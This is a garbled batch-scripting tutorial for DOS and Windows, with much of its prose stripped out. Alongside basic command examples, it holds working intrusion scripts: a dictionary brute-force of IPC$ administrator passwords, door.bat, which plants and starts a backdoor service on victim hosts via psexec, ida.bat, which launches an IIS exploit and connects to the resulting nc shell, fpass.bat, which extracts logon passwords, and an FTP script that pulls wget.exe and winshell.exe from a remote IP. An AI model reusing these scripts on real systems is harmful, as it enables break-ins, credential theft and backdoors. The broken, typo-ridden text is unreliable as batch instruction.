1.

Echo

echo

echo [{on|off}] [message]

Sampleecho off / echo hello world
> >> ^
.
2 @
@

Sample@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format /y autoset
/y )
3

Goto

goto label label

Sample
if {%1}=={} goto noparms
if {%2}=={} goto noparms if%1%2
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
goto

4.Rem
C /*--------*/,

Rem Message
Sample@Rem Here is the description.
5.Pause
Pause
Press any key to continue . . .
Sample
@echo off
:begin
copy a:*.* d\back
echo Please put a new disk into driver A

pause
goto begin
A d:\back
A pause
6.Call
call
Call

call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

[Drive:}[Path] FileName
filename .bat .cmd
7.start
DOS start

MIN
SEPARATE 16 Windows
HIGH HIGH
REALTIME REALTIME
WAIT
parameters /
32- GUI CMD.EXE

8.choice
choice /c:c:
1234
: choice /c:dme defrag,mem,end

defrag,mem,end[D,M,E]?
Sample
Sample.bat :
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem

mem
goto end
:end
echo good bye
defrag,mem,end[D,M,E]? d m e if d
defrag m mem e end
goto end end good bye
9.If
if :
1if "" == ""
(
if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2if exist

if exist config.sys edit config.sys

3if errorlevel / if not errorlevel

if errorlevel 2 goto x2
DOS DOS errorlevel 01
10.for
for
FOR %%variable
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable
(set)
command
command-parameters
FOR %%variable
%variable %i %I
FOR
:
FOR /D %variable IN (set) DO command [command-parameters]


FOR /R [[drive:]path] %variable IN (set) DO command [command [drive:]path
FOR /R
(.)
FOR /L %variable IN (start,step,end) DO command [command-para

(1,1,5) 1 2 3 4 5(5,-1,1)
(5 4 3 2 1)
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
usebackq :
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
filenameset filenameset

For /F
"options"

:
eol=c - ()
skip=n -
delims=xxx -

tokens=x,y,m-n -
for
nth m

usebackq - :


fi

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
myfile.txt
for /
for %i
%j %k

usebackq

%i for %j %k
tokens= tokens=
26 z
Z FOR
52
FOR /F
filenameset

FOR /F
filenameset
CMD.EXE
:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

FOR
:
~I - (") %I
%~fI - %I
%~dI - %I
%~pI - %I
%~nI - %I
%~xI - %I

%~sI -
%~aI - %I
%~tI - %I /
%~zI - %I
%~$PATH:I - %I

:
%~dpI - %I
%~nxI - %I
%~fsI - %I
%~dp$PATH:i - %I

%~ftzaI - %I DIR
%I PATH %~
FOR %I

MS For
sample2
For Win2k
net use \\ip\ipc$ "password" /u:"administrator"
for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
i% admin dict.txt i% net use
find
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ": ">>D:\ok.txt
ko
sample3

FOR %%variable
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens sample1 victim.txt door.bat
%i %j %k

 cultivate.bat net use IPC$ copy victimIf

errorlever = echo echo
delims= vivtim.txt victim.txt
%%i %%j %%k ip password username

--------------- cut here then save as a batchfile(I call it main.bat ) -------------------@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) -------------------------------------- cut here then save as a batchfile(I call it door.bat) ----------------@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) ------------------Windrv32.exe,PSexec.exe
.
,:+DDOS ,,
().,.

BAT
DOS
DOS DOS Edit Windows
(notepad)
(if)(goto)
(for)
C

 DOS

DOS
DOS (path)
bat batch C:\BATCH
path c:\batch

DOS Win9x/Me C: AUTOEXEC.BAT

Windows 98 autoexec.bat
@ECHO OFF
PATH
C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;C:\SYSTOOLS;C:\WINT
OOLS;C:\BATCH
LH SMARTDRV.EXE /X
LH DOSKEY.COM /INSERT
LH CTMOUSE.EXE
SET TEMP=D:\TEMP
SET TMP=D:\TEMP

wps > DOS

C:\>cd wps
C:\WPS>spdos
C:\WPS>py
C:\WPS>wbx
C:\WPS>wps
WPS
runwps.bat

@echo off
c:
cd\wps
spdos
py
wbx
wps
cd\
wps runwps

echo@callpauserem(:: rem)

echo
echo off
@ echo off

call call

pause Press any key to continue...

rem

1 edit a.bat c:\a.bat

a.txt UCDOS WPS
:
@echo off
dir c:\*.* >a.txt c a.txt
call c:\ucdos\ucdos.bat ucdos
echo ""
pause ,
rem wps wps
cd ucdos ucdos
wps wps

C DOS
"%"
%[1-9] Tab
%0 %9%0 %1 %9

2C: f.bat
@echo off
format %1
C:\>f a:
f.bat %1 a: format %1 format a:
format a:
3C: t.bat:
@echo off
type %1
type %2
C:\>t a.txt b.txt
%1 : a.txt
%2 : b.txt
a.txt b.txt

if goto choice for

if :
1if [not] "" == ""
(not )

if "%1"=="a" format a:
2if [not] exist [\]

: if exist c:\config.sys type c:\config.sys

c:\config.sys
3if errorlevel <>
DOS ()
if errorlevel (
)

if errorlevel 2 goto x2
goto goto ( label:
)goto if
:
goto end
:end
echo this is the end
":"
choice
errorlevel if errorlevel
choice DOS Windows choice
choice /?
choice Windows 2003 choice choice

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]
:

:
/C choices "YN"
/N

/CS
/T timeout 0 9999 0

/D choice nnnn /C ;
/T nnnn
/M text
/?
:

ERRORLEVEL 1
2
255 ERRORLEVEL Ctrl+Break Ctrl+C
0 ERRORLEVEL ERRORLEVEL

:
CHOICE /?
CHOICE /C YNC /M " Y N C"
CHOICE /T 10 /C ync /CS /D y
CHOICE /C ab /M " 1 a 2 b"
CHOICE /C ab /N /M " 1 a 2 b"
CHOICE /C YNC /M " Y N C"

Y N C [Y,N,C]?
test.bat if errorlevel :
@echo off
choice /C dme /M "defrag,mem,end"
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errotlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
"defrag,mem,end[D,M,E]?" d m e if
d defrag m mem
e end goto end end
good bye
for

FOR %%variable IN (set) DO command [command-parameters]

%%variable
(set)
command
command-parameters
:
for %%c in (*.bat *.txt) do type %%c
bat txt

1. IF-EXIST
1)
C:\ test1.bat
@echo off
IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT
IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

C:\>TEST1.BAT
C:\ AUTOEXEC.BAT

2)
test2.bat
@ECHO OFF
IF EXIST \%1 TYPE \%1
IF NOT EXIST \%1 ECHO \%1 does not exist
:
C:\>TEST2 AUTOEXEC.BAT

(1) IF EXIST
IF EXIST [+]
(2) test2.bat %1 DOS 9 %1~
%9(%0 test2 ) %1
AUTOEXEC.BAT
3) TEST3.BAT
@echo off
IF "%1" == "A" ECHO XIAO
IF "%2" == "B" ECHO TIAN
IF "%3" == "C" ECHO XIN

C:\>TEST3 A B C
:
XIAO
TIAN
XIN

C:\>TEST3 A B

XIAO
TIAN
DOS %3
2IF-ERRORLEVEL
TEST4.BAT
@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO

IF ERRORLEVEL 0 ECHO
:
C:\>TEST4
""""
IF ERRORLEVEL DOS

@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
IF ERRORLEVEL 0 ECHO
IF ERRORLEVEL 1 ECHO
IF ERRORLEVEL 2 ECHO ctrl-c
IF ERRORLEVEL 3 ECHO
IF ERRORLEVEL 4 ECHO

ctrl-c

backup
0
1
2
3 ctrl-c
4
diskcomp
0
1
2 ctrl-c
3
4
diskcopy
0
1 /
2 ctrl-c
3
4
format
0
3 ctrl-c
4
5 "proceed with formaty/n?" n

xcopy
0
1
2 ctrl-c
4
5
3IF STRING1 == STRING2
TEST5.BAT
@echo off
IF "%1" == "A" formAT A:

C:\>TEST5 A
A:

if [%1]==[A] if %1*==A*
5GOTO
TEST6.BAT
@ECHO OFF
IF EXIST C:\AUTOEXEC.BAT GOTO _COPY
GOTO _DONE
:_COPY
COPY C:\AUTOEXEC.BAT D:\
:_DONE

(1) ASCII ":"

(2)
(3) DOS
6FOR
C:\TEST7.BAT
@ECHO OFF
FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

C:>TEST7
C: BATTXTSYS

win2000 BAT

1.
2.
3. ()
4.
5. 1 tmp.txt
6. 2 sample.bat

###########################
1.
###########################
ver
cmd /?
set /?
rem /?
if /?
echo /?
goto /?
for /?
shift /?
call /?

type /?
find /?
findstr /?
copy /?

echo ver >tmp.txt

ver >>tmp.txt
echo cmd /? >>tmp.txt
cmd /? >>tmp.txt
echo rem /? >>tmp.txt
rem /? >>tmp.txt
echo if /? >>tmp.txt
if /? >>tmp.txt
echo goto /? >>tmp.txt
goto /? >>tmp.txt
echo for /? >>tmp.txt
for /? >>tmp.txt
echo shift /? >>tmp.txt
shift /? >>tmp.txt
echo call /? >>tmp.txt
call /? >>tmp.txt
echo type /? >>tmp.txt
type /? >>tmp.txt
echo find /? >>tmp.txt
find /? >>tmp.txt
echo findstr /? >>tmp.txt
findstr /? >>tmp.txt
echo copy /? >>tmp.txt
copy /? >>tmp.txt
type tmp.txt

#############################
2.
#############################
C:\Program Files>set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=FIRST
ComSpec=C:\WINNT\system32\cmd.exe
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:\WINNT\system32\os2\dll;
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0605
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINNT
TEMP=C:\WINNT\TEMP
TMP=C:\WINNT\TEMP
USERPROFILE=C:\Documents and Settings\Default User
windir=C:\WINNT
path: . copy
%windir%\system32\. . .
: copy mychenxu.exe %windir%\system32\.
(.)
(,)
%windir%
%%windir%% .

%temp%
%windir%
%errorlevel%
..
. ("") porgram file
C:\>dir p*
C:\
2000-09-02 11:47 2,164 PDOS.DEF
1999-01-03 00:47 <DIR> Program Files
1 2,164
1 1,505,997,824

C:\>cd pro*
C:\Program Files>
C:\>
C:\>cd "Program Files"
C:\Program Files>
############################################
3. ()
############################################

con nul aux \ / | || && ^ > < *

You can use most characters as variable values, including white space. If you use the special
characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks.
If you use quotation marks, they are included as part of the value because everything following the
equal sign is taken as the value. Consider the following examples:
(: ^."")
To create the variable value new&name, type:
set varname=new^&name
To create the variable value "new&name", type:
set varname="new&name"
The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by
the escape character (^) or quotation marks when you pass them as arguments.
find "Pacific Rim" < trade.txt > nwtrade.txt
IF EXIST filename. (del filename.) ELSE echo filename. missing
>
>>
@ . cmd , echo off
^ ( > < &). aaa bbb
echo 123456 ^> aaa
echo 1231231 > bbb
()
(echo aa & echo bb)
, .
; ,
:
|
& Usage & [& ...]

dir c:\*.exe & dir d:\*.exe & dir e:\*.exe

&& Usage && [&& ...]

|| Usage || [|| ...]

IF [NOT] ERRORLEVEL number command para1 para2

IF [NOT] string1==string2 command para1 para2
IF [NOT] EXIST filename command para1 para2
IF EXIST filename command para1 para2
IF NOT EXIST filename command para1 para2
IF "%1"=="" goto END
IF "%1"=="net" goto NET
IF NOT "%2"=="net" goto OTHER
IF ERRORLEVEL 1 command para1 para2
IF NOT ERRORLEVEL 1 command para1 para2
FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k
ijklmnopq .
eol=c - ()
skip=n -
delims=xxx -
########################
4.
########################
echo This is test > a.txt
type a.txt
echo This is test 11111 >> a.txt
type a.txt
echo This is test 22222 > a.txt
type a.txt
echo
echo a.txt a.txt
netstat -n | find "3389"
3389 ip.
________________test.bat______
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem ,
@rem ,
@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find
find.exe)
@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find
fina.exe)

_____________________________
idahack ida ..
___________________ida.bat_____
@rem ver 1.0
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"
@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2
:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:SP2
@idahack.exe %1 80 %2 99 %temp%\_tmp
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)
:END
_____________________ida.bat__END_______
. administrator .
..
___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe"
@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%\_findpass.txt
@echo ________________________________Here__pass
@ipconfig /all >>%temp%\_findpass.txt

@goto END
:USAGE
@pulist.exe >%temp%\_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"
:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END_______________________________________________
____________
telnet .(win)
. .Ctrl+V . !!
echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w